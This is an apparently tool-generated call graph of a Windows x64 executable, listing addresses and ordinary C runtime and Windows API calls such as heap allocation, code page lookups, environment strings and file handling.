7ff7c71d04e4 37 API calls 16651->16654 16655 7ff7c71d11b0 16651->16655 16657 7ff7c71d11c4 16651->16657 16652->16651 16653->16651 16654->16651 16656 7ff7c71ca970 _isindst 17 API calls 16655->16656 16656->16657 16657->16648 16659 7ff7c71c977c 16658->16659 16663 7ff7c71c9785 16658->16663 16659->16663 17035 7ff7c71c927c 16659->17035 16663->16501 16663->16502 16665 7ff7c71d7069 16664->16665 16668 7ff7c71d7096 16664->16668 16666 7ff7c71d706e 16665->16666 16665->16668 16667 7ff7c71c4f78 _get_daylight 11 API calls 16666->16667 16670 7ff7c71d7073 16667->16670 16669 7ff7c71d70da 16668->16669 16671 7ff7c71d70f9 16668->16671 16686 7ff7c71d70ce __crtLCMapStringW 16668->16686 16673 7ff7c71c4f78 _get_daylight 11 API calls 16669->16673 16672 7ff7c71ca950 _invalid_parameter_noinfo 37 API calls 16670->16672 16674 7ff7c71d7103 16671->16674 16675 7ff7c71d7115 16671->16675 16676 7ff7c71d707e 16672->16676 16677 7ff7c71d70df 16673->16677 16678 7ff7c71c4f78 _get_daylight 11 API calls 16674->16678 16679 7ff7c71c4fbc 45 API calls 16675->16679 16676->16495 16680 7ff7c71ca950 _invalid_parameter_noinfo 37 API calls 16677->16680 16681 7ff7c71d7108 16678->16681 16682 7ff7c71d7122 16679->16682 16680->16686 16683 7ff7c71ca950 _invalid_parameter_noinfo 37 API calls 16681->16683 16682->16686 17082 7ff7c71d8b78 16682->17082 16683->16686 16686->16495 16687 7ff7c71c4f78 _get_daylight 11 API calls 16687->16686 16689 7ff7c71c9221 16688->16689 16702 7ff7c71c921d 16688->16702 16711 7ff7c71d2660 16689->16711 16694 7ff7c71c9233 16696 7ff7c71ca9b8 __free_lconv_mon 11 API calls 16694->16696 16695 7ff7c71c923f 16737 7ff7c71c92ec 16695->16737 16696->16702 16699 7ff7c71ca9b8 __free_lconv_mon 11 API calls 16700 7ff7c71c9266 16699->16700 16701 7ff7c71ca9b8 __free_lconv_mon 11 API calls 16700->16701 16701->16702 16702->16578 16703 7ff7c71c955c 16702->16703 16704 7ff7c71c959e 16703->16704 16705 7ff7c71c9585 16703->16705 16704->16705 16706 7ff7c71cec08 _get_daylight 11 API calls 16704->16706 16707 7ff7c71c962e 16704->16707 16708 7ff7c71d0858 WideCharToMultiByte 16704->16708 16710 7ff7c71ca9b8 __free_lconv_mon 11 API calls 16704->16710 16705->16578 16706->16704 16709 7ff7c71ca9b8 __free_lconv_mon 11 API calls 16707->16709 16708->16704 16709->16705 16710->16704 16712 7ff7c71d266d 16711->16712 16713 7ff7c71c9226 16711->16713 16756 7ff7c71cb294 16712->16756 16717 7ff7c71d299c GetEnvironmentStringsW 16713->16717 16718 7ff7c71c922b 16717->16718 16720 7ff7c71d29cc 16717->16720 16718->16694 16718->16695 16719 7ff7c71d0858 WideCharToMultiByte 16721 7ff7c71d2a1d 16719->16721 16720->16719 16720->16720 16722 7ff7c71d2a24 FreeEnvironmentStringsW 16721->16722 16723 7ff7c71cd66c _fread_nolock 12 API calls 16721->16723 16722->16718 16724 7ff7c71d2a37 16723->16724 16725 7ff7c71d2a3f 16724->16725 16726 7ff7c71d2a48 16724->16726 16727 7ff7c71ca9b8 __free_lconv_mon 11 API calls 16725->16727 16728 7ff7c71d0858 WideCharToMultiByte 16726->16728 16729 7ff7c71d2a46 16727->16729 16730 7ff7c71d2a6b 16728->16730 16729->16722 16731 7ff7c71d2a6f 16730->16731 16732 7ff7c71d2a79 16730->16732 16734 7ff7c71ca9b8 __free_lconv_mon 11 API calls 16731->16734 16733 7ff7c71ca9b8 __free_lconv_mon 11 API calls 16732->16733 16735 7ff7c71d2a77 FreeEnvironmentStringsW 16733->16735 16734->16735 16735->16718 16738 7ff7c71c9311 16737->16738 16739 7ff7c71cec08 _get_daylight 11 API calls 16738->16739 16746 7ff7c71c9347 16739->16746 16740 7ff7c71ca9b8 __free_lconv_mon 11 API calls 16742 7ff7c71c9247 16740->16742 16741 7ff7c71c93c2 16743 7ff7c71ca9b8 __free_lconv_mon 11 API calls 16741->16743 16742->16699 16743->16742 16744 7ff7c71cec08 _get_daylight 11 API calls 16744->16746 16745 7ff7c71c93b1 16936 7ff7c71c9518 16745->16936 16746->16741 16746->16744 16746->16745 16747 7ff7c71ca514 __std_exception_copy 37 API calls 16746->16747 16751 7ff7c71c93e7 16746->16751 16752 7ff7c71c934f 16746->16752 16754 7ff7c71ca9b8 __free_lconv_mon 11 API calls 16746->16754 16747->16746 16750 7ff7c71ca9b8 __free_lconv_mon 11 API calls 16750->16752 16753 7ff7c71ca970 _isindst 17 API calls 16751->16753 16752->16740 16755 7ff7c71c93fa 16753->16755 16754->16746 16757 7ff7c71cb2a5 FlsGetValue 16756->16757 16758 7ff7c71cb2c0 FlsSetValue 16756->16758 16759 7ff7c71cb2b2 16757->16759 16760 7ff7c71cb2ba 16757->16760 16758->16759 16761 7ff7c71cb2cd 16758->16761 16762 7ff7c71cb2b8 16759->16762 16763 7ff7c71ca574 __CxxCallCatchBlock 45 API calls 16759->16763 16760->16758 16764 7ff7c71cec08 _get_daylight 11 API calls 16761->16764 16776 7ff7c71d2334 16762->16776 16765 7ff7c71cb335 16763->16765 16766 7ff7c71cb2dc 16764->16766 16767 7ff7c71cb2fa FlsSetValue 16766->16767 16768 7ff7c71cb2ea FlsSetValue 16766->16768 16770 7ff7c71cb306 FlsSetValue 16767->16770 16771 7ff7c71cb318 16767->16771 16769 7ff7c71cb2f3 16768->16769 16773 7ff7c71ca9b8 __free_lconv_mon 11 API calls 16769->16773 16770->16769 16772 7ff7c71caf64 _get_daylight 11 API calls 16771->16772 16774 7ff7c71cb320 16772->16774 16773->16759 16775 7ff7c71ca9b8 __free_lconv_mon 11 API calls 16774->16775 16775->16762 16799 7ff7c71d25a4 16776->16799 16778 7ff7c71d2369 16814 7ff7c71d2034 16778->16814 16781 7ff7c71d2386 16781->16713 16782 7ff7c71cd66c _fread_nolock 12 API calls 16783 7ff7c71d2397 16782->16783 16784 7ff7c71d239f 16783->16784 16786 7ff7c71d23ae 16783->16786 16785 7ff7c71ca9b8 __free_lconv_mon 11 API calls 16784->16785 16785->16781 16786->16786 16821 7ff7c71d26dc 16786->16821 16789 7ff7c71d24aa 16790 7ff7c71c4f78 _get_daylight 11 API calls 16789->16790 16792 7ff7c71d24af 16790->16792 16791 7ff7c71d2505 16794 7ff7c71d256c 16791->16794 16832 7ff7c71d1e64 16791->16832 16795 7ff7c71ca9b8 __free_lconv_mon 11 API calls 16792->16795 16793 7ff7c71d24c4 16793->16791 16796 7ff7c71ca9b8 __free_lconv_mon 11 API calls 16793->16796 16798 7ff7c71ca9b8 __free_lconv_mon 11 API calls 16794->16798 16795->16781 16796->16791 16798->16781 16800 7ff7c71d25c7 16799->16800 16801 7ff7c71d25d1 16800->16801 16847 7ff7c71d0348 EnterCriticalSection 16800->16847 16803 7ff7c71d2643 16801->16803 16806 7ff7c71ca574 __CxxCallCatchBlock 45 API calls 16801->16806 16803->16778 16807 7ff7c71d265b 16806->16807 16809 7ff7c71d26b2 16807->16809 16811 7ff7c71cb294 50 API calls 16807->16811 16809->16778 16812 7ff7c71d269c 16811->16812 16813 7ff7c71d2334 65 API calls 16812->16813 16813->16809 16815 7ff7c71c4fbc 45 API calls 16814->16815 16816 7ff7c71d2048 16815->16816 16817 7ff7c71d2054 GetOEMCP 16816->16817 16818 7ff7c71d2066 16816->16818 16820 7ff7c71d207b 16817->16820 16819 7ff7c71d206b GetACP 16818->16819 16818->16820 16819->16820 16820->16781 16820->16782 16822 7ff7c71d2034 47 API calls 16821->16822 16823 7ff7c71d2709 16822->16823 16824 7ff7c71d285f 16823->16824 16825 7ff7c71d2746 IsValidCodePage 16823->16825 16830 7ff7c71d2760 __scrt_get_show_window_mode 16823->16830 16826 7ff7c71bc5c0 _log10_special 8 API calls 16824->16826 16825->16824 16827 7ff7c71d2757 16825->16827 16828 7ff7c71d24a1 16826->16828 16829 7ff7c71d2786 GetCPInfo 16827->16829 16827->16830 16828->16789 16828->16793 16829->16824 16829->16830 16848 7ff7c71d214c 16830->16848 16935 7ff7c71d0348 EnterCriticalSection 16832->16935 16849 7ff7c71d2189 GetCPInfo 16848->16849 16850 7ff7c71d227f 16848->16850 16849->16850 16855 7ff7c71d219c 16849->16855 16851 7ff7c71bc5c0 _log10_special 8 API calls 16850->16851 16853 7ff7c71d231e 16851->16853 16853->16824 16859 7ff7c71d2eb0 16855->16859 16860 7ff7c71c4fbc 45 API calls 16859->16860 16861 7ff7c71d2ef2 16860->16861 16879 7ff7c71cf910 16861->16879 16881 7ff7c71cf919 MultiByteToWideChar 16879->16881 16937 7ff7c71c93b9 16936->16937 16938 7ff7c71c951d 16936->16938 16937->16750 16939 7ff7c71c9546 16938->16939 16940 7ff7c71ca9b8 __free_lconv_mon 11 API calls 16938->16940 16941 7ff7c71ca9b8 __free_lconv_mon 11 API calls 16939->16941 16940->16938 16941->16937 16943 7ff7c71d6331 16942->16943 16944 7ff7c71d6348 16942->16944 16945 7ff7c71c4f78 _get_daylight 11 API calls 16943->16945 16944->16943 16946 7ff7c71d6356 16944->16946 16947 7ff7c71d6336 16945->16947 16949 7ff7c71c4fbc 45 API calls 16946->16949 16950 7ff7c71d6341 16946->16950 16948 7ff7c71ca950 _invalid_parameter_noinfo 37 API calls 16947->16948 16948->16950 16949->16950 16950->16608 16952 7ff7c71c4fbc 45 API calls 16951->16952 16953 7ff7c71d8fe1 16952->16953 16956 7ff7c71d8c38 16953->16956 16959 7ff7c71d8c86 16956->16959 16957 7ff7c71bc5c0 _log10_special 8 API calls 16958 7ff7c71d7275 16957->16958 16958->16608 16958->16614 16960 7ff7c71d8d0d 16959->16960 16962 7ff7c71d8cf8 GetCPInfo 16959->16962 16965 7ff7c71d8d11 16959->16965 16961 7ff7c71cf910 _fread_nolock MultiByteToWideChar 16960->16961 16960->16965 16963 7ff7c71d8da5 16961->16963 16962->16960 16962->16965 16964 7ff7c71cd66c _fread_nolock 12 API calls 16963->16964 16963->16965 16966 7ff7c71d8ddc 16963->16966 16964->16966 16965->16957 16966->16965 16967 7ff7c71cf910 _fread_nolock MultiByteToWideChar 16966->16967 16968 7ff7c71d8e4a 16967->16968 16969 7ff7c71d8f2c 16968->16969 16970 7ff7c71cf910 _fread_nolock MultiByteToWideChar 16968->16970 16969->16965 16971 7ff7c71ca9b8 __free_lconv_mon 11 API calls 16969->16971 16972 7ff7c71d8e70 16970->16972 16971->16965 16972->16969 16973 7ff7c71cd66c _fread_nolock 12 API calls 16972->16973 16974 7ff7c71d8e9d 16972->16974 16973->16974 16974->16969 16975 7ff7c71cf910 _fread_nolock MultiByteToWideChar 16974->16975 16976 7ff7c71d8f14 16975->16976 16977 7ff7c71d8f34 16976->16977 16978 7ff7c71d8f1a 16976->16978 16985 7ff7c71cefd8 16977->16985 16978->16969 16981 7ff7c71ca9b8 __free_lconv_mon 11 API calls 16978->16981 16981->16969 16982 7ff7c71d8f73 16982->16965 16984 7ff7c71ca9b8 __free_lconv_mon 11 API calls 16982->16984 16983 7ff7c71ca9b8 __free_lconv_mon 11 API calls 16983->16982 16984->16965 16986 7ff7c71ced80 __crtLCMapStringW 5 API calls 16985->16986 16987 7ff7c71cf016 16986->16987 16988 7ff7c71cf01e 16987->16988 16989 7ff7c71cf240 __crtLCMapStringW 5 API calls 16987->16989 16988->16982 16988->16983 16990 7ff7c71cf087 CompareStringW 16989->16990 16990->16988 16992 7ff7c71d7cb1 16991->16992 16993 7ff7c71d7cca HeapSize 16991->16993 16994 7ff7c71c4f78 _get_daylight 11 API calls 16992->16994 16995 7ff7c71d7cb6 16994->16995 16996 7ff7c71ca950 _invalid_parameter_noinfo 37 API calls 16995->16996 16997 7ff7c71d7cc1 16996->16997 16997->16619 16999 7ff7c71d7d03 16998->16999 17000 7ff7c71d7cf9 16998->17000 17002 7ff7c71d7d08 16999->17002 17008 7ff7c71d7d0f _get_daylight 16999->17008 17001 7ff7c71cd66c _fread_nolock 12 API calls 17000->17001 17007 7ff7c71d7d01 17001->17007 17005 7ff7c71ca9b8 __free_lconv_mon 11 API calls 17002->17005 17003 7ff7c71d7d15 17006 7ff7c71c4f78 _get_daylight 11 API calls 17003->17006 17004 7ff7c71d7d42 HeapReAlloc 17004->17007 17004->17008 17005->17007 17006->17007 17007->16623 17008->17003 17008->17004 17009 7ff7c71d3600 _get_daylight 2 API calls 17008->17009 17009->17008 17011 7ff7c71ced80 __crtLCMapStringW 5 API calls 17010->17011 17012 7ff7c71cefb4 17011->17012 17012->16627 17014 7ff7c71c5546 17013->17014 17015 7ff7c71c556a 17013->17015 17019 7ff7c71ca9b8 __free_lconv_mon 11 API calls 17014->17019 17021 7ff7c71c5555 17014->17021 17016 7ff7c71c556f 17015->17016 17017 7ff7c71c55c4 17015->17017 17016->17021 17022 7ff7c71c5584 17016->17022 17024 7ff7c71ca9b8 __free_lconv_mon 11 API calls 17016->17024 17018 7ff7c71cf910 _fread_nolock MultiByteToWideChar 17017->17018 17020 7ff7c71c55e0 17018->17020 17019->17021 17023 7ff7c71c55e7 GetLastError 17020->17023 17029 7ff7c71c5615 17020->17029 17033 7ff7c71ca9b8 __free_lconv_mon 11 API calls 17020->17033 17034 7ff7c71c5622 17020->17034 17021->16631 17021->16632 17025 7ff7c71cd66c _fread_nolock 12 API calls 17022->17025 17026 7ff7c71c4eec _fread_nolock 11 API calls 17023->17026 17024->17022 17025->17021 17028 7ff7c71c55f4 17026->17028 17027 7ff7c71cf910 _fread_nolock MultiByteToWideChar 17031 7ff7c71c5666 17027->17031 17032 7ff7c71c4f78 _get_daylight 11 API calls 17028->17032 17030 7ff7c71cd66c _fread_nolock 12 API calls 17029->17030 17030->17034 17031->17021 17031->17023 17032->17021 17033->17029 17034->17021 17034->17027 17036 7ff7c71c9295 17035->17036 17043 7ff7c71c9291 17035->17043 17056 7ff7c71d2aac GetEnvironmentStringsW 17036->17056 17039 7ff7c71c92a2 17042 7ff7c71ca9b8 __free_lconv_mon 11 API calls 17039->17042 17040 7ff7c71c92ae 17063 7ff7c71c93fc 17040->17063 17042->17043 17043->16663 17048 7ff7c71c963c 17043->17048 17045 7ff7c71ca9b8 __free_lconv_mon 11 API calls 17046 7ff7c71c92d5 17045->17046 17047 7ff7c71ca9b8 __free_lconv_mon 11 API calls 17046->17047 17047->17043 17049 7ff7c71c965f 17048->17049 17052 7ff7c71c9676 17048->17052 17049->16663 17050 7ff7c71cf910 MultiByteToWideChar _fread_nolock 17050->17052 17051 7ff7c71cec08 _get_daylight 11 API calls 17051->17052 17052->17049 17052->17050 17052->17051 17053 7ff7c71c96ea 17052->17053 17055 7ff7c71ca9b8 __free_lconv_mon 11 API calls 17052->17055 17054 7ff7c71ca9b8 __free_lconv_mon 11 API calls 17053->17054 17054->17049 17055->17052 17057 7ff7c71c929a 17056->17057 17058 7ff7c71d2ad0 17056->17058 17057->17039 17057->17040 17059 7ff7c71cd66c _fread_nolock 12 API calls 17058->17059 17060 7ff7c71d2b07 memcpy_s 17059->17060 17061 7ff7c71ca9b8 __free_lconv_mon 11 API calls 17060->17061 17062 7ff7c71d2b27 FreeEnvironmentStringsW 17061->17062 17062->17057 17064 7ff7c71c9424 17063->17064 17065 7ff7c71cec08 _get_daylight 11 API calls 17064->17065 17077 7ff7c71c945f 17065->17077 17066 7ff7c71c9467 17067 7ff7c71ca9b8 __free_lconv_mon 11 API calls 17066->17067 17068 7ff7c71c92b6 17067->17068 17068->17045 17069 7ff7c71c94e1 17070 7ff7c71ca9b8 __free_lconv_mon 11 API calls 17069->17070 17070->17068 17071 7ff7c71cec08 _get_daylight 11 API calls 17071->17077 17072 7ff7c71c94d0 17074 7ff7c71c9518 11 API calls 17072->17074 17073 7ff7c71d04e4 37 API calls 17073->17077 17075 7ff7c71c94d8 17074->17075 17078 7ff7c71ca9b8 __free_lconv_mon 11 API calls 17075->17078 17076 7ff7c71c9504 17079 7ff7c71ca970 _isindst 17 API calls 17076->17079 17077->17066 17077->17069 17077->17071 17077->17072 17077->17073 17077->17076 17080 7ff7c71ca9b8 __free_lconv_mon 11 API calls 17077->17080 17078->17066 17081 7ff7c71c9516 17079->17081 17080->17077 17083 7ff7c71d8ba1 __crtLCMapStringW 17082->17083 17084 7ff7c71d715e 17083->17084 17085 7ff7c71cefd8 6 API calls 17083->17085 17084->16686 17084->16687 17085->17084 19560 7ff7c71dac53 19561 7ff7c71dac63 19560->19561 19564 7ff7c71c54e8 LeaveCriticalSection 19561->19564 15937 7ff7c71bbb50 15938 7ff7c71bbb7e 15937->15938 15939 7ff7c71bbb65 15937->15939 15939->15938 15942 7ff7c71cd66c 15939->15942 15943 7ff7c71cd6b7 15942->15943 15947 7ff7c71cd67b _get_daylight 15942->15947 15952 7ff7c71c4f78 15943->15952 15945 7ff7c71cd69e HeapAlloc 15946 7ff7c71bbbde 15945->15946 15945->15947 15947->15943 15947->15945 15949 7ff7c71d3600 15947->15949 15955 7ff7c71d3640 15949->15955 15961 7ff7c71cb338 GetLastError 15952->15961 15954 7ff7c71c4f81 15954->15946 15960 7ff7c71d0348 EnterCriticalSection 15955->15960 15962 7ff7c71cb379 FlsSetValue 15961->15962 15967 7ff7c71cb35c 15961->15967 15963 7ff7c71cb369 SetLastError 15962->15963 15964 7ff7c71cb38b 15962->15964 15963->15954 15978 7ff7c71cec08 15964->15978 15967->15962 15967->15963 15969 7ff7c71cb3b8 FlsSetValue 15971 7ff7c71cb3c4 FlsSetValue 15969->15971 15972 7ff7c71cb3d6 15969->15972 15970 7ff7c71cb3a8 FlsSetValue 15973 7ff7c71cb3b1 15970->15973 15971->15973 15991 7ff7c71caf64 15972->15991 15985 7ff7c71ca9b8 15973->15985 15984 7ff7c71cec19 _get_daylight 15978->15984 15979 7ff7c71cec6a 15981 7ff7c71c4f78 _get_daylight 10 API calls 15979->15981 15980 7ff7c71cec4e HeapAlloc 15982 7ff7c71cb39a 15980->15982 15980->15984 15981->15982 15982->15969 15982->15970 15983 7ff7c71d3600 _get_daylight 2 API calls 15983->15984 15984->15979 15984->15980 15984->15983 15986 7ff7c71ca9ec 15985->15986 15987 7ff7c71ca9bd RtlFreeHeap 15985->15987 15986->15963 15987->15986 15988 7ff7c71ca9d8 GetLastError 15987->15988 15989 7ff7c71ca9e5 __free_lconv_mon 15988->15989 15990 7ff7c71c4f78 _get_daylight 9 API calls 15989->15990 15990->15986 15996 7ff7c71cae3c 15991->15996 16008 7ff7c71d0348 EnterCriticalSection 15996->16008 16010 7ff7c71c99d1 16022 7ff7c71ca448 16010->16022 16027 7ff7c71cb1c0 GetLastError 16022->16027 16028 7ff7c71cb1e4 FlsGetValue 16027->16028 16029 7ff7c71cb201 FlsSetValue 16027->16029 16030 7ff7c71cb1fb 16028->16030 16047 7ff7c71cb1f1 16028->16047 16031 7ff7c71cb213 16029->16031 16029->16047 16030->16029 16033 7ff7c71cec08 _get_daylight 11 API calls 16031->16033 16032 7ff7c71cb26d SetLastError 16034 7ff7c71cb28d 16032->16034 16035 7ff7c71ca451 16032->16035 16036 7ff7c71cb222 16033->16036 16037 7ff7c71ca574 __CxxCallCatchBlock 38 API calls 16034->16037 16049 7ff7c71ca574 16035->16049 16038 7ff7c71cb240 FlsSetValue 16036->16038 16039 7ff7c71cb230 FlsSetValue 16036->16039 16042 7ff7c71cb292 16037->16042 16040 7ff7c71cb24c FlsSetValue 16038->16040 16041 7ff7c71cb25e 16038->16041 16043 7ff7c71cb239 16039->16043 16040->16043 16044 7ff7c71caf64 _get_daylight 11 API calls 16041->16044 16045 7ff7c71ca9b8 __free_lconv_mon 11 API calls 16043->16045 16046 7ff7c71cb266 16044->16046 16045->16047 16048 7ff7c71ca9b8 __free_lconv_mon 11 API calls 16046->16048 16047->16032 16048->16032 16058 7ff7c71d36c0 16049->16058 16092 7ff7c71d3678 16058->16092 16097 7ff7c71d0348 EnterCriticalSection 16092->16097 20252 7ff7c71d1720 20263 7ff7c71d7454 20252->20263 20264 7ff7c71d7461 20263->20264 20265 7ff7c71ca9b8 __free_lconv_mon 11 API calls 20264->20265 20267 7ff7c71d747d 20264->20267 20265->20264 20266 7ff7c71ca9b8 __free_lconv_mon 11 API calls 20266->20267 20267->20266 20268 7ff7c71d1729 20267->20268 20269 7ff7c71d0348 EnterCriticalSection 20268->20269 16162 7ff7c71c5698 16163 7ff7c71c56b2 16162->16163 16164 7ff7c71c56cf 16162->16164 16187 7ff7c71c4f58 16163->16187 16164->16163 16165 7ff7c71c56e2 CreateFileW 16164->16165 16167 7ff7c71c5716 16165->16167 16168 7ff7c71c574c 16165->16168 16190 7ff7c71c57ec GetFileType 16167->16190 16216 7ff7c71c5c74 16168->16216 16172 7ff7c71c4f78 _get_daylight 11 API calls 16175 7ff7c71c56bf 16172->16175 16180 7ff7c71ca950 _invalid_parameter_noinfo 37 API calls 16175->16180 16176 7ff7c71c5741 CloseHandle 16182 7ff7c71c56ca 16176->16182 16177 7ff7c71c572b CloseHandle 16177->16182 16178 7ff7c71c5780 16242 7ff7c71c5a34 16178->16242 16179 7ff7c71c5755 16237 7ff7c71c4eec 16179->16237 16180->16182 16186 7ff7c71c575f 16186->16182 16188 7ff7c71cb338 _get_daylight 11 API calls 16187->16188 16189 7ff7c71c4f61 16188->16189 16189->16172 16191 7ff7c71c583a 16190->16191 16192 7ff7c71c58f7 16190->16192 16195 7ff7c71c5866 GetFileInformationByHandle 16191->16195 16200 7ff7c71c5b70 21 API calls 16191->16200 16193 7ff7c71c5921 16192->16193 16194 7ff7c71c58ff 16192->16194 16199 7ff7c71c5944 PeekNamedPipe 16193->16199 16204 7ff7c71c58e2 16193->16204 16196 7ff7c71c5912 GetLastError 16194->16196 16197 7ff7c71c5903 16194->16197 16195->16196 16198 7ff7c71c588f 16195->16198 16203 7ff7c71c4eec _fread_nolock 11 API calls 16196->16203 16201 7ff7c71c4f78 _get_daylight 11 API calls 16197->16201 16202 7ff7c71c5a34 51 API calls 16198->16202 16199->16204 16205 7ff7c71c5854 16200->16205 16201->16204 16206 7ff7c71c589a 16202->16206 16203->16204 16207 7ff7c71bc5c0 _log10_special 8 API calls 16204->16207 16205->16195 16205->16204 16259 7ff7c71c5994 16206->16259 16209 7ff7c71c5724 16207->16209 16209->16176 16209->16177 16211 7ff7c71c5994 10 API calls 16212 7ff7c71c58b9 16211->16212 16213 7ff7c71c5994 10 API calls 16212->16213 16214 7ff7c71c58ca 16213->16214 16214->16204 16215 7ff7c71c4f78 _get_daylight 11 API calls 16214->16215 16215->16204 16217 7ff7c71c5caa 16216->16217 16218 7ff7c71c4f78 _get_daylight 11 API calls 16217->16218 16236 7ff7c71c5d42 __std_exception_destroy 16217->16236 16220 7ff7c71c5cbc 16218->16220 16219 7ff7c71bc5c0 _log10_special 8 API calls 16221 7ff7c71c5751 16219->16221 16222 7ff7c71c4f78 _get_daylight 11 API calls 16220->16222 16221->16178 16221->16179 16223 7ff7c71c5cc4 16222->16223 16266 7ff7c71c7e78 16223->16266 16225 7ff7c71c5cd9 16226 7ff7c71c5ce1 16225->16226 16227 7ff7c71c5ceb 16225->16227 16228 7ff7c71c4f78 _get_daylight 11 API calls 16226->16228 16229 7ff7c71c4f78 _get_daylight 11 API calls 16227->16229 16235 7ff7c71c5ce6 16228->16235 16230 7ff7c71c5cf0 16229->16230 16231 7ff7c71c4f78 _get_daylight 11 API calls 16230->16231 16230->16236 16232 7ff7c71c5cfa 16231->16232 16233 7ff7c71c7e78 45 API calls 16232->16233 16233->16235 16234 7ff7c71c5d34 GetDriveTypeW 16234->16236 16235->16234 16235->16236 16236->16219 16238 7ff7c71cb338 _get_daylight 11 API calls 16237->16238 16239 7ff7c71c4ef9 __free_lconv_mon 16238->16239 16240 7ff7c71cb338 _get_daylight 11 API calls 16239->16240 16241 7ff7c71c4f1b 16240->16241 16241->16186 16243 7ff7c71c5a5c 16242->16243 16251 7ff7c71c578d 16243->16251 16360 7ff7c71cf794 16243->16360 16245 7ff7c71c5af0 16246 7ff7c71cf794 51 API calls 16245->16246 16245->16251 16247 7ff7c71c5b03 16246->16247 16248 7ff7c71cf794 51 API calls 16247->16248 16247->16251 16249 7ff7c71c5b16 16248->16249 16250 7ff7c71cf794 51 API calls 16249->16250 16249->16251 16250->16251 16252 7ff7c71c5b70 16251->16252 16253 7ff7c71c5b8a 16252->16253 16254 7ff7c71c5bc1 16253->16254 16255 7ff7c71c5b9a 16253->16255 16256 7ff7c71cf628 21 API calls 16254->16256 16257 7ff7c71c4eec _fread_nolock 11 API calls 16255->16257 16258 7ff7c71c5baa 16255->16258 16256->16258 16257->16258 16258->16186 16260 7ff7c71c59b0 16259->16260 16261 7ff7c71c59bd FileTimeToSystemTime 16259->16261 16260->16261 16263 7ff7c71c59b8 16260->16263 16262 7ff7c71c59d1 SystemTimeToTzSpecificLocalTime 16261->16262 16261->16263 16262->16263 16264 7ff7c71bc5c0 _log10_special 8 API calls 16263->16264 16265 7ff7c71c58a9 16264->16265 16265->16211 16267 7ff7c71c7f02 16266->16267 16268 7ff7c71c7e94 16266->16268 16303 7ff7c71d0830 16267->16303 16268->16267 16269 7ff7c71c7e99 16268->16269 16271 7ff7c71c7eb1 16269->16271 16272 7ff7c71c7ece 16269->16272 16278 7ff7c71c7c48 GetFullPathNameW 16271->16278 16286 7ff7c71c7cbc GetFullPathNameW 16272->16286 16277 7ff7c71c7ec6 __std_exception_destroy 16277->16225 16279 7ff7c71c7c6e GetLastError 16278->16279 16280 7ff7c71c7c84 16278->16280 16282 7ff7c71c4eec _fread_nolock 11 API calls 16279->16282 16281 7ff7c71c7c80 16280->16281 16284 7ff7c71c4f78 _get_daylight 11 API calls 16280->16284 16281->16277 16283 7ff7c71c7c7b 16282->16283 16285 7ff7c71c4f78 _get_daylight 11 API calls 16283->16285 16284->16281 16285->16281 16287 7ff7c71c7cef GetLastError 16286->16287 16290 7ff7c71c7d05 __std_exception_destroy 16286->16290 16288 7ff7c71c4eec _fread_nolock 11 API calls 16287->16288 16289 7ff7c71c7cfc 16288->16289 16291 7ff7c71c4f78 _get_daylight 11 API calls 16289->16291 16292 7ff7c71c7d01 16290->16292 16293 7ff7c71c7d5f GetFullPathNameW 16290->16293 16291->16292 16294 7ff7c71c7d94 16292->16294 16293->16287 16293->16292 16295 7ff7c71c7e08 memcpy_s 16294->16295 16296 7ff7c71c7dbd __scrt_get_show_window_mode 16294->16296 16295->16277 16296->16295 16297 7ff7c71c7df1 16296->16297 16300 7ff7c71c7e2a 16296->16300 16298 7ff7c71c4f78 _get_daylight 11 API calls 16297->16298 16302 7ff7c71c7df6 16298->16302 16299 7ff7c71ca950 _invalid_parameter_noinfo 37 API calls 16299->16295 16300->16295 16301 7ff7c71c4f78 _get_daylight 11 API calls 16300->16301 16301->16302 16302->16299 16306 7ff7c71d0640 16303->16306 16307 7ff7c71d0682 16306->16307 16308 7ff7c71d066b 16306->16308 16310 7ff7c71d0686 16307->16310 16311 7ff7c71d06a7 16307->16311 16309 7ff7c71c4f78 _get_daylight 11 API calls 16308->16309 16313 7ff7c71d0670 16309->16313 16332 7ff7c71d07ac 16310->16332 16344 7ff7c71cf628 16311->16344 16317 7ff7c71ca950 _invalid_parameter_noinfo 37 API calls 16313->16317 16315 7ff7c71d06ac 16320 7ff7c71d0751 16315->16320 16327 7ff7c71d06d3 16315->16327 16328 7ff7c71d067b __std_exception_destroy 16317->16328 16318 7ff7c71d068f 16319 7ff7c71c4f58 _fread_nolock 11 API calls 16318->16319 16321 7ff7c71d0694 16319->16321 16320->16308 16322 7ff7c71d0759 16320->16322 16324 7ff7c71c4f78 _get_daylight 11 API calls 16321->16324 16325 7ff7c71c7c48 13 API calls 16322->16325 16323 7ff7c71bc5c0 _log10_special 8 API calls 16326 7ff7c71d07a1 16323->16326 16324->16313 16325->16328 16326->16277 16329 7ff7c71c7cbc 14 API calls 16327->16329 16328->16323 16330 7ff7c71d0717 16329->16330 16330->16328 16331 7ff7c71c7d94 37 API calls 16330->16331 16331->16328 16333 7ff7c71d07f6 16332->16333 16334 7ff7c71d07c6 16332->16334 16336 7ff7c71d0801 GetDriveTypeW 16333->16336 16338 7ff7c71d07e1 16333->16338 16335 7ff7c71c4f58 _fread_nolock 11 API calls 16334->16335 16337 7ff7c71d07cb 16335->16337 16336->16338 16339 7ff7c71c4f78 _get_daylight 11 API calls 16337->16339 16340 7ff7c71bc5c0 _log10_special 8 API calls 16338->16340 16341 7ff7c71d07d6 16339->16341 16342 7ff7c71d068b 16340->16342 16343 7ff7c71ca950 _invalid_parameter_noinfo 37 API calls 16341->16343 16342->16315 16342->16318 16343->16338 16358 7ff7c71da540 16344->16358 16347 7ff7c71cf675 16350 7ff7c71bc5c0 _log10_special 8 API calls 16347->16350 16348 7ff7c71cf69c 16349 7ff7c71cec08 _get_daylight 11 API calls 16348->16349 16351 7ff7c71cf6ab 16349->16351 16352 7ff7c71cf709 16350->16352 16353 7ff7c71cf6c4 16351->16353 16354 7ff7c71cf6b5 GetCurrentDirectoryW 16351->16354 16352->16315 16356 7ff7c71c4f78 _get_daylight 11 API calls 16353->16356 16354->16353 16355 7ff7c71cf6c9 16354->16355 16357 7ff7c71ca9b8 __free_lconv_mon 11 API calls 16355->16357 16356->16355 16357->16347 16359 7ff7c71cf65e GetCurrentDirectoryW 16358->16359 16359->16347 16359->16348 16361 7ff7c71cf7a1 16360->16361 16362 7ff7c71cf7c5 16360->16362 16361->16362 16363 7ff7c71cf7a6 16361->16363 16365 7ff7c71cf7ff 16362->16365 16366 7ff7c71cf81e 16362->16366 16364 7ff7c71c4f78 _get_daylight 11 API calls 16363->16364 16367 7ff7c71cf7ab 16364->16367 16368 7ff7c71c4f78 _get_daylight 11 